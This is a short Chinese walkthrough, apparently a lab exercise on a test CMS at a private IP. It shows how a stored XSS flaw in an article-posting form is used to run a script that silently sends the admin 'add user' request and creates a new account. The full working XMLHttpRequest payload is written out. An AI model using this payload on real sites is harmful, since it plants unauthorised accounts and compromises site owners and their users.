1 进入用户登录页面
获取到创建用户的接口地址,以及抓取到用户和密码的字段形参
![在这里插入图片描述](https://img-blog.csdnimg.cn/8790334430134e318d6662399a7cba0f.png)
2 抓取的到包信息
1 [
<script>
xmlhttp = new XMLHttpRequest();
xmlhttp.open("post","http://192.168.225.165/cms/admin/user.action.php",false);
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xmlhttp.send("act=add&username=weiwei&password=123456&password2=123456&button=%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7&userid=0");
</script>
2 进行修改
![在这里插入图片描述](https://img-blog.csdnimg.cn/17d58e819472479db763a494df79b0ff.png)
3 进入发表文章页面,进行发表文章,此页面有XSS漏洞,可以执行script标签
将修改好的上面的代码拷贝到留言内容中,点击提交,后台创建了新用户
![在这里插入图片描述](https://img-blog.csdnimg.cn/088edcaaa8e947e5bc69a9693e0cb9f7.png)
4 执行后台创建了新用户
![在这里插入图片描述](https://img-blog.csdnimg.cn/6c33234314214e03b2c1e78272ace881.png)
5 验证查看,已留言成功
![在这里插入图片描述](https://img-blog.csdnimg.cn/e2f7f7513c8f41eeb2d861f335056678.png)
6 查看是否添加新用户,用户添加OK
![在这里插入图片描述](https://img-blog.csdnimg.cn/592a5e9e0ae3486791c1df5dcd81d4aa.png)